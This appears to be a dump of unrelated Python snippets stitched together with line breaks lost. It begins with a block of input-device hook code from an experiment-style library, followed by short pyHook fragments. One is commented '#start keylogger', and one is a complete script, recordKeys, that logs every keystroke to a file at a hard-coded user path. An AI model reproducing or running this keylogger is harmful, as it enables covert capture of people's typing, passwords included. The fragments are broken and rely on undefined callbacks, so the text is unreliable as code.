deviceDict = ioServer.deviceDict iohub = self hookManager = self._hookManager if dev_cls_name in ('Mouse', 'Keyboard'): if Computer.platform == 'win32': try: import pyHook except ImportError: import pyWinhook as pyHook if hookManager is None: iohub.log('Creating pyHook HookManager....') hookManager = self._hookManager = pyHook.HookManager() hookManager.keyboard_hook = False if dev_cls_name == 'Mouse': if hookManager.mouse_hook is False: dmouse = deviceDict['Mouse'] hookManager.MouseAll = dmouse._nativeEventCallback hookManager.HookMouse() elif dev_cls_name == 'Keyboard': if hookManager.keyboard_hook is False: dkeyboard = deviceDict['Keyboard'] hookManager.KeyAll = dkeyboard._nativeEventCallback hookManager.HookKeyboard() elif Computer.platform.startswith('linux'): from .devices import pyXHook if hookManager is None: # iohub.log("Creating pyXHook Monitors....") log_evt = self.config.get('log_raw_kb_mouse_events', False) self._hookManager = pyXHook.HookManager(log_evt) hookManager = self._hookManager hookManager._mouseHooked = False hookManager._keyboardHooked = False if dev_cls_name == 'Keyboard': if hookManager._keyboardHooked is False: hookManager.HookKeyboard() kbcb_func = deviceDict['Keyboard']._nativeEventCallback hookManager.KeyDown = kbcb_func hookManager.KeyUp = kbcb_func hookManager._keyboardHooked = True elif dev_cls_name == 'Mouse': if hookManager._mouseHooked is False: hookManager.HookMouse() mcb_func = deviceDict['Mouse']._nativeEventCallback hookManager.MouseAllButtonsDown = mcb_func hookManager.MouseAllButtonsUp = mcb_func hookManager.MouseAllMotion = mcb_func hookManager._mouseHooked = True if hookManager._running is False: hookManager.start() else: # OSX if self._hookDevice is None: self._hookDevice = [] if dev_cls_name not in self._hookDevice: if dev_cls_name == 'Mouse': dmouse = deviceDict['Mouse'] mouseHookMonitor = DeviceMonitor(dmouse, 0.004) self.deviceMonitors.append(mouseHookMonitor) dmouse._CGEventTapEnable(dmouse._tap, True) self._hookDevice.append('Mouse') if dev_cls_name == 'Keyboard': dkeyboard = deviceDict['Keyboard'] kbHookMonitor = DeviceMonitor(dkeyboard, 0.004) self.deviceMonitors.append(kbHookMonitor) dkeyboard._CGEventTapEnable(dkeyboard._tap, True) self._hookDevice.append('Keyboard') return [dev_cls_name, dconf['name'], dinstance._getRPCInterface()]
def pup(): #start keylogger proc = pyHook.HookManager() proc.KeyDown = pressed_chars proc.HookKeyboard() pythoncom.PumpMessages()
def MonitorKeyboard(): hm = pyHook.HookManager() hm.KeyDown = onKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
def hooker(): hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages()
import pythoncom, pyHook, sys, logging class recordKeys(): def __init__(self, file_log): self.file_log = file_log def OnKeyboardEvent(self, event): logging.basicConfig(filename=self.file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True if __name__ == '__main__': r = recordKeys('C:\\Users\\jonmu\\Documents\\GitHub\\ai1\log.txt') hm = pyHook.HookManager() hm.KeyDown = r.OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
def main(): hm = pyHook.HookManager() hm.MouseAll = onMouseEvent hm.HookMouse() pythoncom.PumpMessages()